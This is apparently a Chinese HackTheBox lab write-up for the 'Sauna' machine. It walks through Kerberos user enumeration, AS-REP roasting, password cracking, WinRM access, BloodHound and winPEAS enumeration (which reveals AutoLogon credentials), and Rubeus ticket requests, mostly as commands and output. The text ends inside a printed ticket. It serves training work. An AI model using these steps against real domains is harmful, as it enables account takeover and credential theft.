HackTheBox-Sauna

我們都被困在這寂寞的夜晚

陽光照進窗簾卻太過刺眼

靶机ip:10.129.95.180

难度:简单

涉及内容:

开源情报收集 (OSINT) 与自定义字典生成

Kerberos 预认证机制与枚举 (Kerbrute)

AS-REP Roasting 攻击

Windows 远程管理 (WinRM) 的利用

Active Directory 枚举与权限路径分析 (BloodHound)

Windows 注册表 AutoLogon 敏感信息泄露

Windows Logon Session 与 Rubeus 原理分析

DCSync 攻击与 NTDS.dit 哈希导出

哈希传递攻击 (Pass-The-Hash)

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #nmap -p- 10.129.95.180 -sV -sC -T4 -A -O
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-30 01:09 CDT
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.72% done; ETC: 01:12 (0:02:47 remaining)
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 20.00% done; ETC: 01:11 (0:00:24 remaining)
Stats: 0:03:09 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.45% done; ETC: 01:12 (0:00:00 remaining)
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 90.00% done; ETC: 01:13 (0:00:00 remaining)
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 91.25% done; ETC: 01:13 (0:00:00 remaining)
Nmap scan report for 10.129.95.180
Host is up (0.0026s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-30 13:11:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time: 
|   date: 2026-04-30T13:12:26
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT     ADDRESS
1   1.66 ms 10.10.14.1
2   2.19 ms 10.129.95.180

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.92 seconds

nxcsmb枚举shares

1
2
3
4
5
6
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #nxc smb 10.129.95.180 -u "" -p "" --shares
SMB         10.129.95.180   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.95.180   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\:
SMB         10.129.95.180   445    SAUNA            [-] Error enumerating shares: STATUS_ACCESS_DENIED

目录爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #dirsearch -u http://10.129.95.180/

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/skyarrow/Desktop/reports/http_10.129.95.180/__26-04-30_01-16-53.txt

Target: http://10.129.95.180/

[01:16:53] Starting: 
[01:16:54] 403 -  312B  - /%2e%2e//google.com
[01:16:54] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:16:57] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[01:16:58] 200 -   30KB - /about.html
[01:17:05] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:17:07] 200 -   15KB - /contact.html
[01:17:07] 301 -  148B  - /css  ->  http://10.129.95.180/css/
[01:17:10] 301 -  150B  - /fonts  ->  http://10.129.95.180/fonts/
[01:17:11] 301 -  151B  - /images  ->  http://10.129.95.180/images/
[01:17:11] 403 -    1KB - /images/

Task Completed

访问about.html,发现人名

做成字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌─[root@htb-hlx1pljzsg][/home/skyarrow/Desktop]
└──╼ #cat users.txt 
Fergus
Smith 
Shaun
Coins
Sophie
Driver 
Hugo
Bear
Bowie
Taylor
Steven
Kerb
F.Smith
S.Coins
S.Driver
H.Bear
B.Taylor
S.Kerb
FSmith
SCoins
SDriver
HBear
BTaylor
SKerb

kerbrute跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc EGOTISTICAL-BANK.LOCAL users.txt 

__             __               __

   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/30/26 - Ronnie Flathers @ropnop

2026/04/30 01:27:09 >  Using KDC(s):
2026/04/30 01:27:09 >  	EGOTISTICAL-BANK.LOCAL:88

2026/04/30 01:27:09 >  [+] VALID USERNAME:	 FSmith@EGOTISTICAL-BANK.LOCAL
2026/04/30 01:27:09 >  Done! Tested 24 usernames (1 valid) in 0.013 seconds

Kerbrute 不依赖于 SMB 协议,而是通过向域控的 88 端口发送不带预认证信息的 Kerberos AS-REQ 请求。如果域控返回 KRB5KDC_ERR_PREAUTH_REQUIRED,说明该用户存在;如果返回 KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN,说明用户不存在。这种方式速度极快且不易触发账户锁定。

1
2
3
4
5
6
7
8

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/FSmith -request -no-pass -dc-ip 10.129.95.180
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:616f39a47a305c792f9abdf70af96eac$2fed53903257c8504c8d3f043e26cb93fece874e0fab89ea55b0eed6f59f28b41c70d6c52455a2f4fa0f0a239bfab4a2f20872b165be53a10b5e3b38bfa349794ada5ff6bcc9ccc9750fba25ab23b1115a167a53f9bb49e7bd8d0f2ec8492943aaa466f8493f83670b65a048333824f78a8b209ba59f4c9004ba78d72a0d3fc3cb481f40b0ccfb7fe37b41d5e0a80c731f09020b98cc267fbe04ca528e53fac9938d371e33ee4d4811966aca8ba565fe2ae662da9ae5251785492dc354a223e48cada6bc0e5bebb7333665bc2346da55f41f3f7755a51b0e71df9402c195bb154a4650358ee56882f7112ff29c07f757cd72886fdf271d8a77b54690ce0ddd0f

AD 中有一个账号选项名为“不需要 Kerberos 预身份验证 (Do not require Kerberos preauthentication)”。当该选项开启时,任何人都可以向 KDC 请求该用户的 TGT。KDC 会返回一个 AS-REP 数据包,其中包含使用该用户密码 Hash 加密的部分。攻击者提取这部分数据后,可在本地进行离线暴力破解。

用john跑一下

1
2
3
4
5
6
7
8
9
10
11
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)     
1g 0:00:00:08 DONE (2026-04-30 01:30) 0.1116g/s 1176Kp/s 1176Kc/s 1176KC/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

1
2
3
4
5
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #nxc smb 10.129.95.180 -u "FSmith" -p "Thestrokes23"
SMB         10.129.95.180   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.95.180   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23

认证成功

1
2
3
4
5
┌─[✗][root@htb-hlx1pljzsg][/home/skyarrow/Desktop]
└──╼ #nxc winrm 10.129.95.180 -u "FSmith" -p "Thestrokes23"
WINRM       10.129.95.180   5985   SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.129.95.180   5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)

1
2
3
4
5
6
7
8
9
10
11
12
13
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #evil-winrm -i 10.129.95.180 -u "FSmith" -p "Thestrokes23"
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> type C:\Users\FSmith\desktop\user.txt 
ce7cbd923d6a58333fa0985c71afb925

上传sharphound分析域结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload SharpHound.exe
                                        
Info: Uploading /home/skyarrow/Desktop/SharpHound.exe to C:\Users\FSmith\Documents\SharpHound.exe
                                        
Data: 1802240 bytes of 1802240 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./SharpHound.exe -c all
2026-04-30T06:36:25.8204408-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-04-30T06:36:25.8516423-07:00|INFORMATION|SharpHound Version: 2.12.0.0
2026-04-30T06:36:25.8516423-07:00|INFORMATION|SharpHound Common Version: 4.6.1.0
2026-04-30T06:36:26.0235423-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-04-30T06:36:26.0547822-07:00|INFORMATION|Initializing SharpHound at 6:36 AM on 4/30/2026
2026-04-30T06:36:26.1016560-07:00|INFORMATION|Resolved current domain to EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.2578981-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2026-04-30T06:36:26.3516588-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.3673070-07:00|INFORMATION|Collecting AdminSDHolder data for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.4141745-07:00|INFORMATION|AdminSDHolder ACL hash 00282C4ECB176A3D401881255CEFB538664FC932 calculated for EGOTISTICAL-BANK.LOCAL.
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5391447-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5547658-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5547658-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.5547658-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.6485268-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.7891484-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.7891484-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.7891484-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8360164-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8516454-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8516454-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8672735-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8672735-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8672735-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8829012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8829012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8829012-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8985228-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8985228-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.8985228-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9141541-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9297746-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9297746-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9297746-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9453983-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:26.9766474-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL Configuration NC
2026-04-30T06:36:27.0079007-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.0547708-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2110277-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2110277-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2110277-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2735189-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2735189-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.2891456-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.3047660-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.3047660-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:27.3047660-07:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-04-30T06:36:28.4297690-07:00|INFORMATION|Producer has finished, closing LDAP channel
2026-04-30T06:36:28.4297690-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-04-30T06:36:34.0078989-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-04-30T06:36:34.0391523-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-04-30T06:36:34.1490701-07:00|INFORMATION|Status: 297 objects finished (+297 42.42857)/s -- Using 70 MB RAM
2026-04-30T06:36:34.1490701-07:00|INFORMATION|Enumeration finished in 00:00:07.8041284
2026-04-30T06:36:34.2266442-07:00|INFORMATION|Saving cache with stats: 16 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2026-04-30T06:36:34.2579125-07:00|INFORMATION|SharpHound Enumeration Completed at 6:36 AM on 4/30/2026! Happy Graphing!
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir


    Directory: C:\Users\FSmith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/30/2026   6:36 AM          30530 20260430063628_BloodHound.zip
-a----        4/30/2026   6:36 AM        1351680 SharpHound.exe
-a----        4/30/2026   6:36 AM           1308 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


上传winpeas进行进一步枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found (T1083)
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\FSmith : FSmith [Allow: AllAccess]
    C:\Users\Public
    C:\Users\svc_loanmgr

ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials (T1552.002)
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!


发现一组凭据

同时也发现了对应的用户

1
2
3
4
5
6
7
8
9
10
Computer Name           :   SAUNA
User Name               :   svc_loanmgr
User Id                 :   1108
Is Enabled              :   True
User Type               :   User
Comment                 :
Last Logon              :   1/1/1970 12:00:00 AM
Logons Count            :   0
Password Last Set       :   1/24/2020 4:48:31 PM

查看bloodhound域相关信息,发现该用户对域具有 DCSync 权限

另外还发现了一些有意思的东西

1
2
3
4
5
6
7
8
9
ÉÍÍÍÍÍÍÍÍÍ͹ Kerberoasting / service ticket risks (T1558.003)
È Enumerate weak SPN accounts and legacy Kerberos crypto https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/kerberoast.html
  [-] Domain default supported encryption types not set (legacy compatibility defaults to RC4).
  krbtgt supports: Unspecified (inherits defaults / RC4 compatible) - RC4 TGTs can still be issued.
È Checked 3 SPN-bearing accounts. High-risk RC4/privileged targets: 1, long-lived AES-only targets: 0.
  [!] RC4-enabled or privileged SPN accounts:
      - HSmith (Hugo Smith) | SPNs: SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 | Enc: Unspecified (inherits defaults / RC4 compatible) | RC4 allowed; PasswordNeverExpires; PwdLastSet 2020-01-23


HSmith注册了SPN,那我们可以通过上传Rubeus的方法获取当前用户的TGT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\Rubeus.exe kerberoast /user:HSmith

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : HSmith
[*] Target Domain          : EGOTISTICAL-BANK.LOCAL
[*] Searching path 'LDAP://SAUNA.EGOTISTICAL-BANK.LOCAL/DC=EGOTISTICAL-BANK,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=HSmith)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : HSmith
[*] DistinguishedName      : CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] ServicePrincipalName   : SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111
[*] PwdLastSet             : 1/22/2020 9:54:34 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT

 [X] Error during request for SPN SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111@EGOTISTICAL-BANK.LOCAL : No credentials are available in the security package

*Evil-WinRM* PS C:\Users\FSmith\Documents>

失败了

当你使用 evil-winrm 连接到目标机器时,Windows 使用的是网络登录 (Network Logon - Type 3)。在这种登录类型下,Windows 本地安全机构 (LSA) 不会在内存中缓存该用户的明文密码或可复用的 Kerberos TGT。因为 Rubeus 的 kerberoast 模块默认需要从当前会话的 LSA 内存中提取 TGT 去向 KDC 申请 TGS 票据,而在 WinRM 的会话中,LSA 里是“空”的(没有可用的凭据包),所以会直接报错。

那换种方法,手动获取tgt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\Rubeus.exe asktgt /user:fsmith /password:Thestrokes23 /domain:EGOTISTICAL-BANK.LOCAL /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 58A52D36C84FB7F5F1BEAB9A201DB1DD
[*] Building AS-REQ (w/ preauth) for: 'EGOTISTICAL-BANK.LOCAL\fsmith'
[*] Using domain controller: fe80::685d:94a3:15a2:5147%7:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFajCCBWagAwIBBaEDAgEWooIEYzCCBF9hggRbMIIEV6ADAgEFoRgbFkVHT1RJU1RJQ0FMLUJBTksuTE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFkVHT1RJU1RJQ0FMLUJBTksuTE9DQUyjggQHMIIEA6ADAgESoQMCAQKiggP1BIID8WxkZ2xE813Qg4BKU0yWJnSzHXWV7GZHxw98xdWQX93YZdwHcQr1i/eXYTc11/qBFdZKoazMe5a4BqBiUCiB1JbzbBAkdEPwFciJygo9hAsqCLhOurSQHkJUHiBeNOl12otJjQBYyTJZOGzVlDOEZGVCssz88QS9Gb1UccWyQ3nsOBQBzNLsIKAQ2aTSLlxd4dKntJpICcjgO2+vtA3mY8W68jkYYL+HF2+Z3dcccw0qQ487j5eR7NGQF76KLZGIUGJyuUfuDCEbUDoh3bEBl8ZWEJ8GqsNs8CwcbOjCD+5Qdj7gfMxe7BXCLDwcDbjwL4kI4sQoMSgKrsNE2ws7jYiX9p+piWI3MmmUeHCQfse9y3g+Joe5FIwAXrK2ZYdASwTyd6w6OvRDR0JCXvbA7Qus2XxNoFSIhhRO7Za9jj8px+fr+s5stLPwa4NDmucgpH3Qp8mC6muOqBsT2+FgoBEhGaYVjjZmiB8flLahe3rsmhO70Ly4A6k8Nzka+BzbLQqLn3MFY9lQWtWTcia7Yhf6JRb2l5xf78X0bhk8GlgYINBFAvetqwESgqkDzzpSMlLe77nGBCDkr7JeDAjOl1wKDG0BrpfewaY1egJZjnRAA5RBsPFKfudZDMqNkMOfHRV3XYDCFTcC5fcmlcI93PxbItWOBf1JUEUJ1a5QQnvzBqwhAXNM2oaW7DSphMXdZdGwmPRXUtXXwruTwUAdORh7YF6xM1V+MeZRwuUjD3gW3rttyP4jSqBEHMVZTdbCIYJcttytyrvaXyn/gpNnS5Kocol9LvFXqoxniOEByQAgNvX6khONGKtGxNiq2t7as43Cv936xweuaMS64zdf8f1NUU6S2rTfpaMuvgFeAex0B/QH8GTvch6fTxKHMdzj8lKK2zwFfRDXFOE5xZow8FGjqqC24yNGlcZUkqMZeiLv46pDAGsRtxd2FHVtzl4FDyA5QAKOa6Q2+MSDUeFPYyTK5J4bVJDElLz8FCUxOTDRTHySBoJwi1FtdulMQqr9TCHSRPsF4iv4yh3p5PrBf/eV74KHvS7elN8XeWJl1LGmtN0CMDQZthXQqarknVYirpLze5AeAXAQ8HNtaYjE+lK8vSHORLEYsxSvphhmJbUrWQjYHX+67u4C5x/I4spwYicCSPO4Q9niEvfOQSr727p+4/ZBwp9M/slVEIVvZAMMD4XzayWt8aARwz3jx+5TEwgGgOH2w7q2QUoFoCLKLa9Q1+wNgaWOcA3FIRRHb7ntrZOaFYBDdoSsHIzJ+MlX+KXlR+tf2HHMsRtH